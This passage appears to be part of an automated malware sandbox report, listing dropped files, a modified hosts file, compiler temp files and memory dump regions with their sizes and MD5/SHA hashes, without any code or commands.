30036e21c60e6550d4b73b1557aaccba2206cda3cf82977692fc15fae81f084f1a3552e01cb60f2b5fac85c9711546a154ad10931e41624c06937f30a351ef21

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\HideCompare.docx

Filesize
547KB

MD5
ff04285ea388813d648b9daaf6994933

SHA1
4a2903e5b7d0883242ad7579e443da0e5b11b5a4

SHA256
9ed4a8cb01b8330509f79a94e927cb10b9b149b3bf2d84159a907a132844c064

SHA512
88047a4e2d76903305577824e44fa37e615a97d3ee8b7331cd1c206208f840dd417d28b7940206fd73b8181243b6a753e3811e6a5023107e8e489b2f3825adc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\InvokeWait.xlsx

Filesize
10KB

MD5
915c66f41a2aca601d7f32483f12012a

SHA1
fbc0d18aad00ab446fb5c1f5788dee16738730e5

SHA256
c86855a837c5d271e19227dd8ffb430643ba58a5ca67251d77ee685c15c8fc2e

SHA512
a61c477d2ef63d0a1615ff6c03af4cffc1817fa619daa850de7b5abeb36f21528912ecc2badd8a175733634ff70acaa892fb19a9f7e8723acf31b201ad0804bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\MergeRedo.docx

Filesize
20KB

MD5
bc9c78d31ee909cfabb96d7ad18cf091

SHA1
a8265eb71552832d295dcf59fd79712dbcb28636

SHA256
270e385adaa5189f3f9162816c409be4e79bcfc17b4f720e1c2e11711ed2cb3c

SHA512
e14744179e63a0f9e7256fbbea3e6c7eb3b418a7a8297626c666628b85a7d2ca2c9b657a6de4d56cd7c3c4c9cf93c8fb51a80f5f9634a2ac8441e802c4ed0db6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\SubmitBackup.bmp

Filesize
919KB

MD5
2b48cd2f5c201dcd4eea03bf6085e210

SHA1
3c9eda561913b957404f6f703c7fd9e88e56da47

SHA256
96f4003a816e0754043e1787d62d707fa18c292f4c31ce5ceeb89cc3245dde95

SHA512
720a04ac16ee72989332fc0f28372b77f69e085c0a9707ec4a8a361b49a0b7f5be6dec8d495da71c62080f71dd531e3afd254b836d13e630ce78f0f14f960c06

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\UseStep.docx

Filesize
15KB

MD5
8cd89e7414032977a366e7ad3e64e73f

SHA1
68d42972e2a3e0d31dbd72712491433359a739a6

SHA256
e42527f85ed323b8175215df0bbc3b2c023b146d0e3002545824499c5d3b7645

SHA512
8a4338f9f63e97f2e9970edd045ab78786544b8d7e6e85487c3e79e784e79eaf2e6d858c1d2d42574322c94a0fdc3fe3f7f1fa39b6513616f1ff528193f66a27

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\WaitStep.mp3

Filesize
488KB

MD5
3e1ffae6828092850c124a80bde2c5c1

SHA1
694cc8d8c72ea1bb8fb0d2f6a048bcb696891fe2

SHA256
6876a24f57d0c9bad496fb00ec1f52bc159c6f84bfc2c18b7d030a04d0f97dd6

SHA512
a4e09a89f9841f2190ea69d4683e9b66135f1cb6bb20f0d7d1d41a637c2f8b110c9bb95aa54c45035fd57d2901a77e503119d690e72fe95b363f94ae9f150317

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\OpenRedo.xlsx

Filesize
1.4MB

MD5
7953aa6e2255998755aaa1a1cf1ee04f

SHA1
ec3c7bc454fa4da28e39063042399442f82f9a60

SHA256
f8cadc783bea9508d2baf56792efade31e2b4629764264f10051d78eccc01177

SHA512
ed76d512ecdab6a5d2228e6741f4f68f04a9c1119472a38b75bbfcb8b68ddb04dccb268e78c45667236eb910b8042cd1f1af3c812ed3db833ef4167c2a3cbaef

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\RedoReset.docx

Filesize
17KB

MD5
36c4e30de3df01240be7bdec67191ae5

SHA1
f042441fed161802fe0c5b4579a8f3e7273b601c

SHA256
1e4dce854c41fb7790d5137a5fd69f60f450ab049d21f921eb2f724626a86064

SHA512
f731be654eecc13c7ead3bc66d8b74446e181994b8fae365174685034afc3f6985ae75fcb0798ee71f5ff0d01e920e26117d96781e973c48cd6ee1e88a071a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\RepairGroup.xlsx

Filesize
1.5MB

MD5
19432e990c05898d581b85ae0aa55974

SHA1
dfd36478fdbb3b186ddd75ee6c4c3e506310dbe8

SHA256
fc91f53792a09988af81dd2a6d7dc20e97f85c9d4a8b13eacc1a2fae2ddce5f1

SHA512
353ff9086b7c83bcbc0c607b203a86e9adaf2815e40476808507ac8cd7618b6d36bec4e4da3adb31665ea1f7635c048253d3062e5597562ca963d558717099c6

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bmt1c1zh\CSC91662D41402540C3B4EF88B82A5A38B.TMP

Filesize
652B

MD5
5d8fc170a7ac9ca65a4d25934137883f

SHA1
627135f19d8762281cd44e39aaed5b41fe5094ad

SHA256
f2a1aa064d737301dda9c48a5add19418934d12be11b72b9fa3f0d04efa7bdfa

SHA512
cc77f66d92e525665458b8c4642c7601fc670377e710e4b5e87c4c9b55a8cd3aae6626f70a6c0176a2a992711bb91d87e30af69cdba32f678b9b2de78bca5132

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bmt1c1zh\bmt1c1zh.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bmt1c1zh\bmt1c1zh.cmdline

Filesize
607B

MD5
768f818ebf7970ec86fa16157dd481c7

SHA1
db66bf0f5a839526204deb417d093283e0c6f8e9

SHA256
2b9eb6e514c013bcfae015a6c703015a686a3661ddeec29a50dee2e93f178533

SHA512
36208da8d927dbb7ddcb6c5ef36deea80a8e0d5726f5918187a1aceb5f853984c89d42fb5a186f3666a66b75ba2cffa5958d84da30fc8016229bbe770e23b0d0

Download Submit
memory/1180-87-0x000002A624EC0000-0x000002A624EE2000-memory.dmp

Filesize
136KB

Download
memory/2248-266-0x00007FF88B780000-0x00007FF88B7B3000-memory.dmp

Filesize
204KB

Download
memory/2248-76-0x00007FF88C400000-0x00007FF88C414000-memory.dmp

Filesize
80KB

Download
memory/2248-105-0x00007FF88C420000-0x00007FF88C443000-memory.dmp

Filesize
140KB

Download
memory/2248-56-0x00007FF892850000-0x00007FF892869000-memory.dmp

Filesize
100KB

Download
memory/2248-81-0x00007FF879C10000-0x00007FF879D2C000-memory.dmp

Filesize
1.1MB

Download
memory/2248-78-0x00007FF88C970000-0x00007FF88C99D000-memory.dmp

Filesize
180KB

Download
memory/2248-284-0x00007FF879D30000-0x00007FF87A250000-memory.dmp

Filesize
5.1MB

Download
memory/2248-45-0x00007FF895C50000-0x00007FF895C5F000-memory.dmp

Filesize
60KB

Download
memory/2248-30-0x00007FF88DB40000-0x00007FF88DB63000-memory.dmp

Filesize
140KB

Download
memory/2248-210-0x00007FF892820000-0x00007FF892839000-memory.dmp

Filesize
100KB

Download
memory/2248-25-0x00007FF87A970000-0x00007FF87AF59000-memory.dmp

Filesize
5.9MB

Download
memory/2248-54-0x00007FF88C970000-0x00007FF88C99D000-memory.dmp

Filesize
180KB

Download
memory/2248-79-0x00007FF88F870000-0x00007FF88F87D000-memory.dmp

Filesize
52KB

Download
memory/2248-165-0x00007FF87A250000-0x00007FF87A3C7000-memory.dmp

Filesize
1.5MB

Download
memory/2248-70-0x00007FF87A970000-0x00007FF87AF59000-memory.dmp

Filesize
5.9MB

Download
memory/2248-72-0x000001DE4A520000-0x000001DE4AA40000-memory.dmp

Filesize
5.1MB

Download
memory/2248-73-0x00007FF879D30000-0x00007FF87A250000-memory.dmp

Filesize
5.1MB

Download
memory/2248-74-0x00007FF88DB40000-0x00007FF88DB63000-memory.dmp

Filesize
140KB

Download
memory/2248-71-0x00007FF88B6B0000-0x00007FF88B77D000-memory.dmp

Filesize
820KB

Download
memory/2248-66-0x00007FF88B780000-0x00007FF88B7B3000-memory.dmp

Filesize
204KB

Download
memory/2248-64-0x00007FF895AB0000-0x00007FF895ABD000-memory.dmp

Filesize
52KB

Download
memory/2248-62-0x00007FF892820000-0x00007FF892839000-memory.dmp

Filesize
100KB

Download
memory/2248-60-0x00007FF87A250000-0x00007FF87A3C7000-memory.dmp

Filesize
1.5MB

Download
memory/2248-58-0x00007FF88C420000-0x00007FF88C443000-memory.dmp

Filesize
140KB

Download
memory/2248-281-0x00007FF88B6B0000-0x00007FF88B77D000-memory.dmp

Filesize
820KB

Download
memory/2248-282-0x000001DE4A520000-0x000001DE4AA40000-memory.dmp

Filesize
5.1MB

Download
memory/4576-203-0x000002EF6E890000-0x000002EF6E898000-memory.dmp

Filesize
32KB

Download